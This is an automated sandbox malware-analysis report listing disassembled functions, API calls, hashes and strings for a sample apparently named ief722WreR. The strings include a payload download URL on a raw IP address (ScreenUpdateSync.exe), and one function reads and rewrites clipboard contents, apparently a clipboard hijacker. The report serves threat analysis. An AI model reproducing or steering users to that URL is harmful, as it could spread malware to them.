                                                      • Instruction ID: 941e5d7bb2069d1fb9760ffb86e13a1db41397deee20687f00b4917166382ed0
                                                      • Opcode Fuzzy Hash: 358fd455719f577d8bc93a3d3127ed53d65e98e9d00355e3dd6338ab7ece4e02
                                                      • Instruction Fuzzy Hash: 1BF054302006347BD735AF27E808A5B7A986F41775F584715FC25C22A1D768DD838659

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 489 40239e-4023ac 490 402561-402563 PostQuitMessage 489->490 491 4023b2-4023b7 489->491 494 402569-40256e 490->494 492 4023d0-4023d7 491->492 493 4023b9-4023cb DefWindowProcW 491->493 495 4023d9 call 401da4 492->495 496 4023de-4023e5 492->496 493->494 495->496 496->494 498 4023eb-40255f call 4010ba call 4029f4 496->498 498->494
                                                      APIs
                                                      • DefWindowProcW.USER32(?,?,?,?), ref: 004023C5
                                                      • PostQuitMessage.USER32(00000000), ref: 00402563
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd
                                                      Similarity
                                                      • API ID: MessagePostProcQuitWindow
                                                      • String ID:
                                                      • API String ID: 3873111417-0
                                                      • Opcode ID: e934076550e84698602cd97162307a7d632c652edc7a108d85d40228a86a25f4
                                                      • Instruction ID: 43c76da2243f772c6aced19a3fe0e8e69066b3bbdff08d4cabba9d560eb75400
                                                      • Opcode Fuzzy Hash: e934076550e84698602cd97162307a7d632c652edc7a108d85d40228a86a25f4
                                                      • Instruction Fuzzy Hash: 02412E25A64340A5E730EFA5BD55B2633B0FF64722F10252BE528DB2B2E3B28540C35E

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 503 40155a-4016d0 Sleep call 4010ba 505 4016d5-4016d9 503->505
                                                      APIs
                                                      • Sleep.KERNEL32(00001D1B), ref: 00401562
                                                        • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010C1
                                                        • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010DD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd
                                                      Similarity
                                                      • API ID: _wcslen$Sleep
                                                      • String ID: http://176.113.115.19/ScreenUpdateSync.exe
                                                      • API String ID: 3358372957-3120454669
                                                      • Opcode ID: ec5b8e6b587f5ffe173a4fe2956bfbb53381ca1a870b5d286590f738381d6d8e
                                                      • Instruction ID: 033e26d6726dec48d9da5d172e0a3ce7e355aee553d479aaec466036f4edd3d7
                                                      • Opcode Fuzzy Hash: ec5b8e6b587f5ffe173a4fe2956bfbb53381ca1a870b5d286590f738381d6d8e
                                                      • Instruction Fuzzy Hash: 83319A15A6538094E330CFA0BC95A662330FF64B52F50653BD60CCB2B2E7A18587C35E
                                                      APIs
                                                      • _wcslen.LIBCMT ref: 0040298F
                                                      • __fassign.LIBCMT ref: 0040299F
                                                        • Part of subcall function 00402823: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00402906
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd
                                                      Similarity
                                                      • API ID: Ios_base_dtor__fassign_wcslenstd::ios_base::_
                                                      • String ID:
                                                      • API String ID: 2843524283-0
                                                      • Opcode ID: 99f78a7314c7ad5a03a0c5f770c80a671dc835224e362237c5e255d3e1775ea8
                                                      • Instruction ID: f5c656a3c742482aaca5e7be5327d781ae1f97b048d34cfcbeac2439ecd5e81b
                                                      • Opcode Fuzzy Hash: 99f78a7314c7ad5a03a0c5f770c80a671dc835224e362237c5e255d3e1775ea8
                                                      • Instruction Fuzzy Hash: C901D6B1E0021C5ADB25FA25EC46BEE77689B41304F0041BFA605E31C1E9B85E85CAD8
                                                      APIs
                                                      • SetErrorMode.KERNEL32(00000400,?,?,02480223,?,?), ref: 02480E19
                                                      • SetErrorMode.KERNEL32(00000000,?,?,02480223,?,?), ref: 02480E1E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorMode
                                                      • String ID:
                                                      • API String ID: 2340568224-0
                                                      • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                      • Instruction ID: 625e0f7f1e1b302f448508261efaf1e752b234688f5247d6a6466c6c1b929a9e
                                                      • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                      • Instruction Fuzzy Hash: 85D0123215512877D7003A94DC09BDE7B1CDF05B66F008011FB0DD9180C770954046E5
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 77dff8414438c132d9b1b222249ac9577754d763359ce41167806e2a442978e4
                                                      • Instruction ID: 5858c2b1917228bc3ee007884971bc5cb621fb913b3acd2bc442863518e7715d
                                                      • Opcode Fuzzy Hash: 77dff8414438c132d9b1b222249ac9577754d763359ce41167806e2a442978e4
                                                      • Instruction Fuzzy Hash: 4051D531A00218AFDB10DF59C840BEA7BA1EFC9364F19919AF818AB391C779FD42C754
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd
                                                      Similarity
                                                      • API ID: __fread_nolock
                                                      • String ID:
                                                      • API String ID: 2638373210-0
                                                      • Opcode ID: 330fcc4d7d5ac5b0b2ca1a235d838fa7146c9714e98705db01c69e2caad3ca42
                                                      • Instruction ID: e1021867f2ec77c7d2f8cf192b2e918c2079a777806a714b314ab491ad94b1c1
                                                      • Opcode Fuzzy Hash: 330fcc4d7d5ac5b0b2ca1a235d838fa7146c9714e98705db01c69e2caad3ca42
                                                      • Instruction Fuzzy Hash: 5831ADB1604312AFC710DF2AC88092ABFA9BF84351F04893EFD4497390D739DA548B8A
                                                      APIs
                                                      • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00402906
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd
                                                      Similarity
                                                      • API ID: Ios_base_dtorstd::ios_base::_
                                                      • String ID:
                                                      • API String ID: 323602529-0
                                                      • Opcode ID: 9e105bc645d13b5be37bf51f85b07603bbf9c4582c9b25cdf04d4c3893a06c3e
                                                      • Instruction ID: a0c314b69e82cee7068a10c27dc1ba61f54dd3d6c342bb4161a68c9c894be626
                                                      • Opcode Fuzzy Hash: 9e105bc645d13b5be37bf51f85b07603bbf9c4582c9b25cdf04d4c3893a06c3e
                                                      • Instruction Fuzzy Hash: B03118B4D002199BDB14EFA5D881AEDBBB4BF08304F5085AEE415B3281DB786A49CF54
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd
                                                      Similarity
                                                      • API ID: H_prolog3_catch
                                                      • String ID:
                                                      • API String ID: 3886170330-0
                                                      • Opcode ID: 28d5133743d5d263c03eb5789c04d0db7473107e9a476edf8ad5427a5007d233
                                                      • Instruction ID: b71381d5bc9e259bdf0532d7d2dd1dfab3929909e68e206b89482bd8707b5f49
                                                      • Opcode Fuzzy Hash: 28d5133743d5d263c03eb5789c04d0db7473107e9a476edf8ad5427a5007d233
                                                      • Instruction Fuzzy Hash: 9F215E70600205DFCB11DF55C580EADBBB5BF48704F14C06EE815AB3A2C778AE50CB94
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd
                                                      Similarity
                                                      • API ID: __wsopen_s
                                                      • String ID:
                                                      • API String ID: 3347428461-0
                                                      • Opcode ID: ebde34e331f36d73ae22f6b7be2bf13c9f524ff7c3251c4fe3554b52cc0156cf
                                                      • Instruction ID: ced19a79aea4b3e33dd998471e9e3f3b23a78e9704dbb7c6d54aa915c2495f90
                                                      • Opcode Fuzzy Hash: ebde34e331f36d73ae22f6b7be2bf13c9f524ff7c3251c4fe3554b52cc0156cf
                                                      • Instruction Fuzzy Hash: 3911187590420AAFCF05DF58E94199B7BF4FF4C314F10406AF819AB311D671EA25CBA9
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd
                                                      Similarity
                                                      • API ID: _free
                                                      • String ID:
                                                      • API String ID: 269201875-0
                                                      • Opcode ID: dcff01ba0718bc25fbadba801be0e76f759b5211c2d86b2f90a3e61a906836b7
                                                      • Instruction ID: e101c5f3f91c4e465480e224300ffd561ec2350ede5005b950df212ed8b6fbff
                                                      • Opcode Fuzzy Hash: dcff01ba0718bc25fbadba801be0e76f759b5211c2d86b2f90a3e61a906836b7
                                                      • Instruction Fuzzy Hash: B6F0BE33910008FBCF159E96DC01DDF3B6EEF8D338F100116F91492150DA3ACA21ABA4
                                                      APIs
                                                      • RtlAllocateHeap.NTDLL(00000000,0040D870,00000000,?,0042679E,00000002,00000000,00000000,00000000,?,0040CD21,0040D870,00000004,00000000,00000000,00000000), ref: 004336D9
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd
                                                      Similarity
                                                      • API ID: AllocateHeap
                                                      • String ID:
                                                      • API String ID: 1279760036-0
                                                      • Opcode ID: 94f750592cee1f743f5fc95d96a6c8fbd485f7a37a0c4c452716bcfbad1791b8
                                                      • Instruction ID: 0777d31d9fa185a8b849a759fdbdb2b75b345829f9b614c7a8fa7ff1ccc7c9d0
                                                      • Opcode Fuzzy Hash: 94f750592cee1f743f5fc95d96a6c8fbd485f7a37a0c4c452716bcfbad1791b8
                                                      • Instruction Fuzzy Hash: AAE0E5313002207FD6303E675D07B5B36489F497A6F042127EC05A23D0DA6DEE0085AD
                                                      APIs
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 004103C7
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd
                                                      Similarity
                                                      • API ID: Exception@8Throw
                                                      • String ID:
                                                      • API String ID: 2005118841-0
                                                      • Opcode ID: 0f8767ceb07e994d1f5b8eaac8dd392143d78e3b1b871650e8a1b44da905b8b1
                                                      • Instruction ID: a93cbdcc7b8cec239d3e65b0583cf012edeaa99edf8fc6fd77b2b60b17382ec4
                                                      • Opcode Fuzzy Hash: 0f8767ceb07e994d1f5b8eaac8dd392143d78e3b1b871650e8a1b44da905b8b1
                                                      • Instruction Fuzzy Hash: 58E09B3450430E76CB1476A5FC1595D376C6A00354B904237BC28654D1DF78F59D858D
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd
                                                      Similarity
                                                      • API ID: Deallocate
                                                      • String ID:
                                                      • API String ID: 1075933841-0
                                                      • Opcode ID: d86d5cecc1e96241595adfcfb1704e736ddb91d28ce44d5c5f584f8131ffb7cb
                                                      • Instruction ID: fec367d8aa59221bd54f7e77a34cd6e8baa5892bd02020f9b8e7ed08d49e55ed
                                                      • Opcode Fuzzy Hash: d86d5cecc1e96241595adfcfb1704e736ddb91d28ce44d5c5f584f8131ffb7cb
                                                      • Instruction Fuzzy Hash: 71D067B1518611CEE764DF69E444656B7E4EF04310B24492FE4D9D2694E6749880CB44
                                                      APIs
                                                      • CreateFileW.KERNEL32(00000000,00000000,?,0043D0E5,?,?,00000000,?,0043D0E5,00000000,0000000C), ref: 0043CD27
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd
                                                      Similarity
                                                      • API ID: CreateFile
                                                      • String ID:
                                                      • API String ID: 823142352-0
                                                      • Opcode ID: c1825962b9e2d68b99604ae1ec91ea351fd51148a2f332f138c69e8dc7c90181
                                                      • Instruction ID: f5cec35e3468c2ebfedbe18043dc9de9c020ce50a8bef62643be49baa2ffa0a5
                                                      • Opcode Fuzzy Hash: c1825962b9e2d68b99604ae1ec91ea351fd51148a2f332f138c69e8dc7c90181
                                                      • Instruction Fuzzy Hash: DCD06C3200014DBBDF028F84DC06EDA3BAAFB48714F014150BA1856020C732E921AB95
                                                      APIs
                                                      • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 00AF999E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3676143282.0000000000AF9000.00000040.00000020.00020000.00000000.sdmp, Offset: 00AF9000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_af9000_ief722WreR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocVirtual
                                                      • String ID:
                                                      • API String ID: 4275171209-0
                                                      • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                      • Instruction ID: 32e4bbfb631bc02c6e49a61d739bdbf8bd14f0aa3deb82673b5d65bce112ff57
                                                      • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                      • Instruction Fuzzy Hash: 07113C79A00208EFDB01DF98CA85E99BFF5AF08350F058095FA489B362D371EA50DF80
                                                      APIs
                                                      • __EH_prolog3_GS.LIBCMT ref: 0248194D
                                                      • Sleep.KERNEL32(00001541), ref: 02481957
                                                        • Part of subcall function 0248CE77: _strlen.LIBCMT ref: 0248CE8E
                                                      • OpenClipboard.USER32(00000000), ref: 02481984
                                                      • GetClipboardData.USER32(00000001), ref: 02481994
                                                      • _strlen.LIBCMT ref: 024819B0
                                                      • _strlen.LIBCMT ref: 024819DF
                                                      • _strlen.LIBCMT ref: 02481B23
                                                      • EmptyClipboard.USER32 ref: 02481B39
                                                      • GlobalAlloc.KERNEL32(00000002,00000001), ref: 02481B46
                                                      • GlobalUnlock.KERNEL32(00000000), ref: 02481B70
                                                      • SetClipboardData.USER32(00000001,00000000), ref: 02481B79
                                                      • GlobalFree.KERNEL32(00000000), ref: 02481B80
                                                      • CloseClipboard.USER32 ref: 02481BA4
                                                      • Sleep.KERNEL32(000002D2), ref: 02481BAF
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Clipboard$_strlen$Global$DataSleep$AllocCloseEmptyFreeH_prolog3_OpenUnlock
                                                      • String ID: 4#E$i
                                                      • API String ID: 4246938166-2480119546
                                                      • Opcode ID: 45a8dad81ff59b0f4b4464c7594e59c36273e081b3ff668940b9dbd8c87fe3c1
                                                      • Instruction ID: b978c31468590a52dea869d75f85652d3b4ea07be727883c63709c40da631531
                                                      • Opcode Fuzzy Hash: 45a8dad81ff59b0f4b4464c7594e59c36273e081b3ff668940b9dbd8c87fe3c1
                                                      • Instruction Fuzzy Hash: 4A512431C107949AD311AFA4EC45BFD7774FF2A306F04522BD809A6162EB709686CB69
                                                      APIs
                                                      • NtdllDefWindowProc_W.NTDLL(?,00000014,?,?), ref: 0248239C
                                                      • GetClientRect.USER32(?,?), ref: 024823B1
                                                      • GetDC.USER32(?), ref: 024823B8
                                                      • CreateSolidBrush.GDI32(00646464), ref: 024823CB
                                                      • CreatePen.GDI32(00000001,00000001,00FFFFFF), ref: 024823EA
                                                      • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 0248240B
                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 02482416
                                                      • MulDiv.KERNEL32(00000008,00000000), ref: 0248241F
                                                      • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000031,00451F10), ref: 02482443
                                                      • SetBkMode.GDI32(?,00000001), ref: 024824CE
                                                      • _wcslen.LIBCMT ref: 024824E6
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Create$BrushCapsClientDeviceFontModeNtdllProc_RectRectangleSolidWindow_wcslen
                                                      • String ID:
                                                      • API String ID: 1529870607-0
                                                      • Opcode ID: b907d1a1b1e1ec1e10588b01c324950f76be5009d0317e1f7e1d34b68f08428a
                                                      • Instruction ID: a22004ffb4fdee9840a3042c472ed11f56d2906c634f0ab78efc99f85b126369
                                                      • Opcode Fuzzy Hash: b907d1a1b1e1ec1e10588b01c324950f76be5009d0317e1f7e1d34b68f08428a
                                                      • Instruction Fuzzy Hash: 3571FD72910228AFDB22DF68DD85FAEB7BCEB09711F0041A5F509E6151DA70AF84CF24
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd
                                                      Similarity
                                                      • API ID: __floor_pentium4
                                                      • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                      • API String ID: 4168288129-2761157908
                                                      • Opcode ID: 1705c8ec1ca245728102af4e988fb3fc25a52218aafbc3cd1121bd07fbf397af
                                                      • Instruction ID: 9e6dbbf50b3e3cea2dd72b1fc58d7ba5eae27dc46f9bc3f4d00a4e89d85e9552
                                                      • Opcode Fuzzy Hash: 1705c8ec1ca245728102af4e988fb3fc25a52218aafbc3cd1121bd07fbf397af
                                                      • Instruction Fuzzy Hash: 96C25B71E096288FDB25CE29DD407EAB7B5EB48304F1551EBD80DE7280E778AE818F45
                                                      APIs
                                                      • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,0043BA8D,?,00000000), ref: 0043B807
                                                      • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,0043BA8D,?,00000000), ref: 0043B830
                                                      • GetACP.KERNEL32(?,?,0043BA8D,?,00000000), ref: 0043B845
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd
                                                      Similarity
                                                      • API ID: InfoLocale
                                                      • String ID: ACP$OCP
                                                      • API String ID: 2299586839-711371036
                                                      • Opcode ID: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
                                                      • Instruction ID: fa2a6f3f06b8257a5ac591d998b536fc1da73be0d13f1331aa64b533421ee897
                                                      • Opcode Fuzzy Hash: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
                                                      • Instruction Fuzzy Hash: 4B21A136A00104AAD738DF14C801B9777AAEF98F50F669466EB0AD7311E736DE41C7D8
                                                      APIs
                                                      • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,024BBCF4,?,00000000), ref: 024BBA6E
                                                      • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,024BBCF4,?,00000000), ref: 024BBA97
                                                      • GetACP.KERNEL32(?,?,024BBCF4,?,00000000), ref: 024BBAAC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: InfoLocale
                                                      • String ID: ACP$OCP
                                                      • API String ID: 2299586839-711371036
                                                      • Opcode ID: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
                                                      • Instruction ID: 45e7fa293ae2789865667484da2b8d3858e9d66a8975e282e1cd3e857f922556
                                                      • Opcode Fuzzy Hash: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
                                                      • Instruction Fuzzy Hash: CE217732E01105AAD7368F55D901BE777A6EF4AE5CB568066ED09D7300F732DA81C370
                                                      APIs
                                                        • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                        • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
                                                        • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
                                                        • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F39
                                                        • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F46
                                                      • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0043BA4E
                                                      • IsValidCodePage.KERNEL32(00000000), ref: 0043BAA9
                                                      • IsValidLocale.KERNEL32(?,00000001), ref: 0043BAB8
                                                      • GetLocaleInfoW.KERNEL32(?,00001001,004307B5,00000040,?,004308D5,00000055,00000000,?,?,00000055,00000000), ref: 0043BB00
                                                      • GetLocaleInfoW.KERNEL32(?,00001002,00430835,00000040), ref: 0043BB1F
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd
                                                      Similarity
                                                      • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser
                                                      • String ID:
                                                      • API String ID: 2287132625-0
                                                      • Opcode ID: 09e7077a585d70c8480d4b1d78da616f19cbc20ae15e0cb08ae98176a4c780fb
                                                      • Instruction ID: d022b458b050368e3858f313ea430915e0084ddf9245bc07a5b1b9775f8f1cbc
                                                      • Opcode Fuzzy Hash: 09e7077a585d70c8480d4b1d78da616f19cbc20ae15e0cb08ae98176a4c780fb
                                                      • Instruction Fuzzy Hash: E1516171A006059BEB10EFA5CC45BBF73B8FF4C701F14556BEA14E7290E7789A048BA9
                                                      APIs
                                                        • Part of subcall function 024B2141: GetLastError.KERNEL32(?,?,024AA9EC,?,00000000,?,024ACDE6,0248247E,00000000,?,00451F20), ref: 024B2145
                                                        • Part of subcall function 024B2141: _free.LIBCMT ref: 024B2178
                                                        • Part of subcall function 024B2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024B21B9
                                                        • Part of subcall function 024B2141: _free.LIBCMT ref: 024B21A0
                                                        • Part of subcall function 024B2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024B21AD
                                                      • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 024BBCB5
                                                      • IsValidCodePage.KERNEL32(00000000), ref: 024BBD10
                                                      • IsValidLocale.KERNEL32(?,00000001), ref: 024BBD1F
                                                      • GetLocaleInfoW.KERNEL32(?,00001001,024B0A1C,00000040,?,024B0B3C,00000055,00000000,?,?,00000055,00000000), ref: 024BBD67
                                                      • GetLocaleInfoW.KERNEL32(?,00001002,024B0A9C,00000040), ref: 024BBD86
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser
                                                      • String ID:
                                                      • API String ID: 2287132625-0
                                                      • Opcode ID: 119725e359bc42e0bfb9cdb5970e3de8a9f9b5c3b1583b7d82a4707c3220fec3
                                                      • Instruction ID: 4421b78951f844526118e4bf4ae57a2b92a464ca9a4a4e065be02a0366c3c33b
                                                      • Opcode Fuzzy Hash: 119725e359bc42e0bfb9cdb5970e3de8a9f9b5c3b1583b7d82a4707c3220fec3
                                                      • Instruction Fuzzy Hash: F45170719002099AEB12DFA5DC40AFFB7B9EF1470AF14042FED04E7290EB719A458BB1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: C$C
                                                      • API String ID: 0-238425240
                                                      • Opcode ID: 185f0ef558908b44b9225c7828f32a07078ec648b0e05d0c62af8d2f3fb84e81
                                                      • Instruction ID: c20898a9e1ba257a9a920a277c678998c6649ecb9dd7e2fb432374692491c933
                                                      • Opcode Fuzzy Hash: 185f0ef558908b44b9225c7828f32a07078ec648b0e05d0c62af8d2f3fb84e81
                                                      • Instruction Fuzzy Hash: D2025C71E002299BDF14CFAAD9806AEBBF1EF88314F65416AD919E7380D734A9418B94
                                                      APIs
                                                        • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                        • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
                                                        • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
                                                      • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,004307BC,?,?,?,?,00430213,?,00000004), ref: 0043B0EC
                                                      • _wcschr.LIBVCRUNTIME ref: 0043B17C
                                                      • _wcschr.LIBVCRUNTIME ref: 0043B18A
                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,004307BC,00000000,004308DC), ref: 0043B22D
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_free
                                                      • String ID:
                                                      • API String ID: 2444527052-0
                                                      • Opcode ID: 0931e6da1e5e69565e8d8cf9fe0bd78167b9118aed70e948f35c6624fe6e05f7
                                                      • Instruction ID: 51baba79e9d53baeee2bb674299bb26a4ab80324ce8bdae5682f18c88f981068
                                                      • Opcode Fuzzy Hash: 0931e6da1e5e69565e8d8cf9fe0bd78167b9118aed70e948f35c6624fe6e05f7
                                                      • Instruction Fuzzy Hash: 2A611871600305AADB25AB35DC46FAB73A8EF0C754F14142FFA15D7281EB78E90087E9
                                                      APIs
                                                        • Part of subcall function 024B2141: GetLastError.KERNEL32(?,?,024AA9EC,?,00000000,?,024ACDE6,0248247E,00000000,?,00451F20), ref: 024B2145
                                                        • Part of subcall function 024B2141: _free.LIBCMT ref: 024B2178
                                                        • Part of subcall function 024B2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024B21B9
                                                      • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,024B0A23,?,?,?,?,024B047A,?,00000004), ref: 024BB353
                                                      • _wcschr.LIBVCRUNTIME ref: 024BB3E3
                                                      • _wcschr.LIBVCRUNTIME ref: 024BB3F1
